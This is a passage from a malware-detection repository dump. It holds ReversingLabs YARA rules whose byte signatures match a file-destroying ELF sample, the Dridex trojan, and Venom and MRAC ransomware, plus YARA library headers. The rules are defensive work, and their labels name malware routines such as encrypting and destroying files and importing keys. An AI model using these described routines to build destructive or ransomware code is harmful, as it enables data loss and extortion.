18 | strings: 19 | 20 | $destroy_files_using_ioctls = { 21 | 55 89 E5 57 BF ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 89 7C 24 ?? 8B 45 ?? 89 04 24 E8 22 | ?? ?? ?? ?? 85 C0 89 C3 78 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 23 | 8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D 24 | C3 8D 45 ?? BE ?? ?? ?? ?? 89 44 24 ?? 89 74 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 4D ?? 25 | 8B 55 ?? C7 45 ?? ?? ?? ?? ?? 85 C9 89 55 ?? 74 ?? 8D 75 ?? 8D B6 ?? ?? ?? ?? 8D BF 26 | ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? B8 ?? ?? 27 | ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 01 D0 39 45 28 | ?? 89 45 ?? 77 ?? 81 FA ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? C7 45 29 | ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 75 ?? EB ?? 31 C9 89 4C 24 ?? 8B 45 ?? 89 30 | 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 7C 24 ?? 89 1C 24 89 44 24 ?? E8 31 | ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 76 ?? B8 ?? ?? ?? ?? 89 74 24 32 | ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 33 | 24 E8 ?? ?? ?? ?? 80 7D ?? ?? 75 ?? A1 ?? ?? ?? ?? 89 7D ?? 89 45 ?? 8B 45 ?? 89 45 34 | ?? 8D 45 ?? 89 44 24 ?? B8 ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 55 ?? 35 | 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 77 ?? 8D 74 26 ?? 8D BC 27 ?? ?? ?? ?? 31 FF 89 1C 36 | 24 E8 ?? ?? ?? ?? 31 C0 89 44 24 ?? 89 7C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 75 ?? C7 37 | 45 ?? ?? ?? ?? ?? 85 F6 74 ?? 8D 75 ?? 8D 76 ?? B9 ?? ?? ?? ?? 89 74 24 ?? 89 4C 24 38 | ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 77 ?? 89 1C 24 39 | E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3 40 | } 41 | 42 | $destroy_files_using_overwrite = { 43 | 55 89 E5 83 EC ?? 89 5D ?? 8B 5D ?? 8D 45 ?? 89 75 ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? 44 | C7 45 ?? ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 5D ?? 8B 75 45 | ?? 8B 7D ?? 89 EC 5D C3 46 | } 47 | 48 | $redundant_reboot_attempts = { 49 | C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? 50 | ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 51 | 84 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 52 | 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 8D 76 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 53 | 24 E8 ?? ?? ?? ?? 31 D2 83 C4 ?? 89 D0 59 5B 5E 5F 5D 8D 61 ?? C3 54 | } 55 | 56 | condition: 57 | uint32(0) == 0x464C457F and 58 | ( 59 | $destroy_files_using_ioctls 60 | ) and 61 | ( 62 | $destroy_files_using_overwrite 63 | ) and 64 | ( 65 | $redundant_reboot_attempts 66 | ) 67 | } -------------------------------------------------------------------------------- /src/exp/trojan/Win32.Trojan.Dridex.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Trojan_Dridex : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "DRIDEX" 12 | description = "Yara rule that detects Dridex trojan." 13 | 14 | tc_detection_type = "Trojan" 15 | tc_detection_name = "Dridex" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $resolve_api_wrapper_1 = { 21 | 56 57 8B FA 8B F1 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FE ?? ?? ?? ?? 75 ?? 33 C0 5F 22 | 5E C3 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 8B CE E8 ?? 23 | ?? ?? ?? 85 C0 74 ?? 8B D7 ?? ?? ?? ?? E9 24 | } 25 | 26 | $resolve_api_wrapper_2 = { 27 | 57 53 8B FA 8B D9 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FB ?? ?? ?? ?? 74 ?? 8B CB E8 28 | ?? ?? ?? ?? 85 C0 74 ?? 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3 8B CB E8 ?? ?? ?? ?? 84 29 | C0 74 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB 30 | } 31 | 32 | $resolve_api_wrapper_3 = { 33 | 55 8B EC 57 8B 7D ?? 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74 34 | ?? 56 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ?? 35 | 85 C0 75 ?? 5E 33 C0 5F 5D C2 ?? ?? 57 50 E8 ?? ?? ?? ?? 5E 5F 5D C2 36 | } 37 | 38 | $resolve_api_wrapper_4 = { 39 | 55 8B EC FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74 ?? 56 40 | E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ?? 85 C0 41 | 74 ?? 5E 89 45 ?? 5D E9 42 | } 43 | 44 | $find_first_file_snippet_1 = { 45 | 53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? [4-6] BA ?? 46 | ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A ?? 8D 56 ?? 47 | 52 53 51 FF D0 48 | } 49 | 50 | $find_first_file_snippet_2 = { 51 | 57 53 55 8B E9 33 C9 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? 52 | ?? 8B 18 E8 ?? ?? ?? ?? 8B C8 85 C9 74 ?? 33 D2 83 FB ?? 6A ?? 5B 8D 7D ?? 0F 4C DA 53 | 8B C2 53 52 52 57 0F 9D C0 50 FF 75 ?? FF D1 54 | } 55 | 56 | $find_first_file_snippet_3 = { 57 | 53 56 8B F1 33 DB 57 32 C9 89 5E ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 58 | 38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 6A ?? 33 C0 83 FF ?? 59 0F 4C C8 8D 46 ?? 51 53 59 | 53 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2 60 | } 61 | 62 | $find_first_file_snippet_4 = { 63 | 53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? 8D 7B ?? 8D 64 | 5F ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A 65 | ?? 8D 56 ?? 52 53 51 CC C3 66 | } 67 | 68 | $find_first_file_snippet_5 = { 69 | 56 8B F1 32 C9 57 C7 46 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 70 | 8B 38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 33 C0 B9 ?? ?? ?? ?? 83 FF ?? 0F 4C C8 51 50 71 | 50 8D 46 ?? 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2 72 | } 73 | 74 | condition: 75 | uint16(0) == 0x5A4D and 76 | ( 77 | any of ($resolve_api_wrapper_*) and 78 | any of ($find_first_file_snippet_*) 79 | ) 80 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Venom.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Venom : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "VENOM" 12 | description = "Yara rule that detects Venom ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Venom" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $setup_env = { 21 | 00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1B 22 | 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 23 | ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 07 6F ?? ?? 24 | ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 06 11 ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28 25 | ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 1F 26 | ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ?? 27 | 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ?? 72 28 | ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? 29 | ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? 30 | ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 20 ?? ?? ?? ?? 19 7E ?? ?? ?? ?? 19 16 7E ?? ?? ?? 31 | ?? 28 ?? ?? ?? ?? 0D 09 08 20 ?? ?? ?? ?? 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 28 32 | ?? ?? ?? ?? 00 2A 33 | } 34 | 35 | $find_files = { 36 | 00 00 00 03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 00 00 08 72 ?? ?? ?? ?? 6F ?? ?? 37 | ?? ?? 16 FE 01 0D 09 2C ?? 00 08 02 28 ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 00 07 38 | 17 58 0B 07 06 8E 69 32 ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 39 | ?? 00 11 ?? 02 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ?? 40 | 26 00 00 DE ?? 2A 41 | } 42 | 43 | $encrypt_files = { 44 | 00 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ?? 45 | ?? 18 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? 46 | ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 07 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 47 | 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F 48 | ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 17 6F ?? ?? ?? ?? 00 08 06 16 06 49 | 8E 69 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ?? 50 | ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? 51 | ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D 52 | ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 53 | DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 00 00 54 | DE ?? 26 00 00 DE ?? 00 DC 2A 55 | } 56 | 57 | condition: 58 | uint16(0) == 0x5A4D and 59 | ( 60 | $setup_env 61 | ) and 62 | ( 63 | $find_files 64 | ) and 65 | ( 66 | $encrypt_files 67 | ) 68 | } -------------------------------------------------------------------------------- /src/lib/include/yara/integers.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007-2015. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_INTEGERS_H 31 | #define YR_INTEGERS_H 32 | 33 | 34 | #if (defined(_MSC_VER) && (_MSC_VER < 1600)) || \ 35 | (defined(__BORLANDC__) && (__BORLANDC__ <= 0x0560)) 36 | 37 | #ifdef __cplusplus 38 | extern "C" 39 | { 40 | #endif 41 | 42 | // Microsoft Visual Studio C++ before Visual Studio 2010 or earlier versions 43 | // of the Borland C++ Builder do not support the (u)int#_t type definitions 44 | // but have __int# definitions instead 45 | 46 | typedef __int8 int8_t; 47 | typedef unsigned __int8 uint8_t; 48 | typedef __int16 int16_t; 49 | typedef unsigned __int16 uint16_t; 50 | typedef __int32 int32_t; 51 | typedef unsigned __int32 uint32_t; 52 | typedef __int64 int64_t; 53 | typedef unsigned __int64 uint64_t; 54 | 55 | #ifdef __cplusplus 56 | } 57 | #endif 58 | 59 | 60 | #ifndef INT8_MIN 61 | #define INT8_MIN (-127i8 - 1) 62 | #endif 63 | 64 | #ifndef INT16_MIN 65 | #define INT16_MIN (-32767i16 - 1) 66 | #endif 67 | 68 | #ifndef INT32_MIN 69 | #define INT32_MIN (-2147483647i32 - 1) 70 | #endif 71 | 72 | #ifndef INT64_MIN 73 | #define INT64_MIN (-9223372036854775807i64 - 1) 74 | #endif 75 | 76 | #ifndef INT8_MAX 77 | #define INT8_MAX 127i8 78 | #endif 79 | 80 | #ifndef INT16_MAX 81 | #define INT16_MAX 32767i16 82 | #endif 83 | 84 | #ifndef INT32_MAX 85 | #define INT32_MAX 2147483647i32 86 | #endif 87 | 88 | #ifndef INT64_MAX 89 | #define INT64_MAX 9223372036854775807i64 90 | #endif 91 | 92 | #ifndef UINT8_MAX 93 | #define UINT8_MAX 0xffui8 94 | #endif 95 | 96 | #ifndef UINT16_MAX 97 | #define UINT16_MAX 0xffffui16 98 | #endif 99 | 100 | #ifndef UINT32_MAX 101 | #define UINT32_MAX 0xffffffffui32 102 | #endif 103 | 104 | #ifndef UINT64_MAX 105 | #define UINT64_MAX 0xffffffffffffffffui64 106 | #endif 107 | 108 | #else 109 | 110 | // Other "compilers" and later versions of Microsoft Visual Studio C++ and 111 | // Borland C/C++ define the types in 112 | 113 | #include 114 | 115 | #endif 116 | 117 | #endif 118 | -------------------------------------------------------------------------------- /src/lib/modules/pe/authenticode-parser/structs.h: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2021 Avast Software 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 20 | */ 21 | 22 | #ifndef AUTHENTICODE_PARSER_STRUCTS_H 23 | #define AUTHENTICODE_PARSER_STRUCTS_H 24 | 25 | #include 26 | #include 27 | #include 28 | #include 29 | 30 | #ifdef __cplusplus 31 | extern "C" { 32 | #endif 33 | 34 | #define NID_spc_info "1.3.6.1.4.1.311.2.1.12" 35 | #define NID_spc_ms_countersignature "1.3.6.1.4.1.311.3.3.1" 36 | #define NID_spc_nested_signature "1.3.6.1.4.1.311.2.4.1" 37 | #define NID_spc_indirect_data "1.3.6.1.4.1.311.2.1.4" 38 | 39 | typedef struct { 40 | int type; 41 | union { 42 | ASN1_BMPSTRING *unicode; 43 | ASN1_IA5STRING *ascii; 44 | } value; 45 | } SpcString; 46 | 47 | typedef struct { 48 | ASN1_OCTET_STRING *classId; 49 | ASN1_OCTET_STRING *serializedData; 50 | } SpcSerializedObject; 51 | 52 | typedef struct { 53 | int type; 54 | union { 55 | ASN1_IA5STRING *url; 56 | SpcSerializedObject *moniker; 57 | SpcString *file; 58 | } value; 59 | } SpcLink; 60 | 61 | typedef struct { 62 | ASN1_OBJECT *type; 63 | ASN1_TYPE *value; 64 | } SpcAttributeTypeAndOptionalValue; 65 | 66 | typedef struct { 67 | ASN1_BIT_STRING *flags; 68 | SpcLink *file; 69 | } SpcPeImageData; 70 | 71 | typedef struct { 72 | ASN1_OBJECT *algorithm; 73 | ASN1_TYPE *parameters; 74 | } AlgorithmIdentifier; 75 | 76 | typedef struct { 77 | AlgorithmIdentifier *digestAlgorithm; 78 | ASN1_OCTET_STRING *digest; 79 | } DigestInfo; 80 | 81 | typedef struct { 82 | SpcAttributeTypeAndOptionalValue *data; 83 | DigestInfo *messageDigest; 84 | } SpcIndirectDataContent; 85 | 86 | typedef struct { 87 | ASN1_OBJECT *contentType; 88 | SpcIndirectDataContent *content; 89 | } SpcContentInfo; 90 | 91 | typedef struct { 92 | SpcString *programName; 93 | SpcLink *moreInfo; 94 | } SpcSpOpusInfo; 95 | 96 | DECLARE_ASN1_FUNCTIONS(SpcString) 97 | DECLARE_ASN1_FUNCTIONS(SpcSerializedObject) 98 | DECLARE_ASN1_FUNCTIONS(SpcLink) 99 | DECLARE_ASN1_FUNCTIONS(SpcAttributeTypeAndOptionalValue) 100 | DECLARE_ASN1_FUNCTIONS(SpcPeImageData) 101 | DECLARE_ASN1_FUNCTIONS(AlgorithmIdentifier) 102 | DECLARE_ASN1_FUNCTIONS(DigestInfo) 103 | DECLARE_ASN1_FUNCTIONS(SpcIndirectDataContent) 104 | DECLARE_ASN1_FUNCTIONS(SpcSpOpusInfo) 105 | DECLARE_ASN1_FUNCTIONS(SpcContentInfo) 106 | 107 | #ifdef __cplusplus 108 | } 109 | #endif 110 | 111 | #endif 112 | -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.MRAC.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Ransomware_MRAC : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "MRAC" 12 | description = "Yara rule that detects MRAC ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "MRAC" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $encrypt_files = { 21 | B8 ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 22 | 83 C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B 75 ?? 85 C0 75 ?? B1 23 | ?? EB ?? 32 C9 8B 45 ?? 88 4D ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ?? 8B C6 81 F9 ?? 24 | ?? ?? ?? 72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ?? 25 | 8A 4D ?? 83 C4 ?? 8A C1 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? 26 | ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8 27 | } 28 | 29 | $import_key = { 30 | 8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 31 | C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 32 | ?? 89 45 ?? 8D 4D ?? 51 50 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? 33 | ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 75 ?? FF 34 | 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 35 | 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? FF 36 | 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F 37 | 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 38 | 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 39 | ?? ?? ?? ?? 8B C8 F6 C1 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 C1 E8 ?? 40 C1 E0 ?? 2B 40 | C1 68 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 6A 41 | ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 42 | 8B 45 ?? 3D ?? ?? ?? ?? 0F 92 C3 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 57 6A ?? 0F 43 | B6 C3 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 44 | 45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? EB ?? 8B 75 ?? 84 45 | DB 74 46 | } 47 | 48 | $find_files = { 49 | 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 50 | 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 51 | C4 ?? 85 C0 74 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 68 ?? ?? 52 | ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 06 FF 53 | D7 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 54 | F6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 55 | 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 56 | } 57 | 58 | condition: 59 | uint16(0) == 0x5A4D and 60 | ( 61 | $find_files 62 | ) and 63 | ( 64 | $import_key 65 | ) and 66 | ( 67 | $encrypt_files 68 | ) 69 | } -------------------------------------------------------------------------------- /src/lib/include/yara/scanner.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2018. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER 